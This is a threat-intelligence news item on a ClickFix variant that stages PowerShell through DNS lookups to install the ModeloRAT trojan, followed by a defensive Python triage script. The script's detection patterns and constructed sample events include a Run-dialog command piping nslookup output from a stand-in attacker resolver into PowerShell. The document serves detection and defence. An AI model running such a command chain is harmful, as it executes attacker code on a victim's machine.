Tuesday, February 17, 2026

Microsoft Threat Intelligence has identified a new variant of the ClickFix social engineering campaign that shifts from delivering malware over HTTP to using DNS as a staging channel. Victims are tricked into opening the Windows Run dialog (Win+R) and running an nslookup command that queries a DNS server controlled by the attackers. The malicious payload is embedded in the “Name:” field of the DNS response (the hostname nslookup prints back) and is then processed to execute PowerShell commands directly on the victim’s machine. Because the exchange rides on ordinary DNS traffic, the attackers can blend the malicious activity into legitimate network communications and evade traditional web-based detection mechanisms.
Once the initial PowerShell script runs, it downloads a ZIP file from an external server (such as azwsappdev[.]com) to deploy a Python-based remote access trojan (RAT) called ModeloRAT. The malware begins reconnaissance to collect system and network information and establishes persistence by creating VBScript files and startup shortcuts in the Windows Startup folder, so that it runs automatically each time the system boots.
Researchers from Huntress and SC Media report that ModeloRAT and related variants such as CrashFix are linked to the KongTuke threat group, which primarily targets organizations. The campaign uses fake notification pages, such as counterfeit Google Meet alerts or PDF repair tools, to trick victims into manually copying and executing malicious commands. Security experts strongly advise users never to run commands in the Run dialog or a terminal on the instructions of a website they did not seek out, to reduce the risk of compromise.
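A defender-side triage of the indicators this report describes (Run-dialog command chaining nslookup into PowerShell, nslookup pointed at a foreign resolver, lookups of the ZIP staging domain, and Startup-folder persistence files), written here as an added example and not code from Microsoft, Huntress or SC Media. The event format, the resolver allow-list and the sample events are constructed for the illustration.

```python
"""Triage of Sysmon-style telemetry for the ClickFix DNS variant described above.
Added illustration only; event shapes, resolver list and sample values are constructed."""
import re
from pathlib import PureWindowsPath
APPROVED_RESOLVERS = {"10.0.0.53"}        # assumption: the organisation's own DNS servers
KNOWN_BAD_DOMAINS = {"azwsappdev.com"}    # ZIP staging domain named in the report
STARTUP_DIR = r"\microsoft\windows\start menu\programs\startup"
# Run-dialog one-liner that hands nslookup output to PowerShell, in either order.
CHAIN = re.compile(r"nslookup\b.*\b(powershell|pwsh)\b|\b(powershell|pwsh)\b.*nslookup\b", re.I)

def triage(event: dict) -> list[str]:
    """Return the findings for one event; an empty list means nothing matched."""
    findings = []
    if event["type"] == "process_create":
        cmd = event.get("cmdline", "")
        parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
        image = PureWindowsPath(event.get("image", "")).name.lower()
        # 1. explorer.exe launches Run-dialog commands; a shell it spawns chaining nslookup into PowerShell
        if parent == "explorer.exe" and CHAIN.search(cmd):
            findings.append("run-dialog nslookup->powershell chain")
        # 2. nslookup pointed at an explicit resolver (2nd non-option arg) outside the org's DNS servers
        if image == "nslookup.exe":
            args = [a for a in cmd.split()[1:] if not a.startswith("-")]
            if len(args) >= 2 and args[1].lower() not in APPROVED_RESOLVERS:
                findings.append(f"nslookup to unapproved resolver {args[1]}")
    elif event["type"] == "dns_query":
        # 3. any name under the staging domain used to fetch the ModeloRAT ZIP
        name = event.get("query", "").lower().rstrip(".")
        if any(name == d or name.endswith("." + d) for d in KNOWN_BAD_DOMAINS):
            findings.append(f"query for known staging domain {name}")
    elif event["type"] == "file_create":
        # 4. VBScript or shortcut dropped into the Startup folder (persistence)
        path = event.get("path", "").lower()
        if STARTUP_DIR in path and path.endswith((".vbs", ".lnk")):
            findings.append("startup-folder persistence artifact")
    return findings

# Constructed sample events: four that match the described chain, two benign.
SAMPLE_EVENTS = [
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c nslookup lure.invalid 203.0.113.10 | powershell"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\nslookup.exe", "cmdline": "nslookup lure.invalid 203.0.113.10"},
    {"type": "dns_query", "query": "cdn.azwsappdev.com"},
    {"type": "file_create", "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\nslookup.exe", "cmdline": "nslookup intranet.corp 10.0.0.53"},
    {"type": "file_create", "path": r"C:\Users\u\Documents\notes.lnk"},
]
```

Running `triage` over a real process-creation, DNS and file-creation feed only needs the field names mapped to the telemetry source; the resolver allow-list is the one value that must be filled in per environment.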
